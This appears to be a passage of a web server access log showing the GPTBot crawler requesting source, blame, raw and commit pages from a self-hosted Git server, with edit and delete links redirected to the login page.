"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42450] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21631] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21629] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10088] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10069] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12364] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:16:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12590] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:16:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7807] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" -[17/Feb/2026:16:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" -[17/Feb/2026:16:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" -[17/Feb/2026:16:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 17056] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:16:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12769] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12776] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13896] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12982] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12944] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11166] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12014] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8407] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:16:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8405] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:16:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 17919] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:16:26:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 950] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 22588] [Gzip 12.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12632] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:16:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:16:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main...main" [Client 74.7.227.38] [Length 8396] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/compare/main...main?expand=1" -[17/Feb/2026:16:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main..main" [Client 74.7.227.38] [Length 8373] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/compare/main...main?expand=1" -[17/Feb/2026:16:26:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 9808] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10079] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 8781] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:16:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:26:23 +0000] - 200 200 - GET https 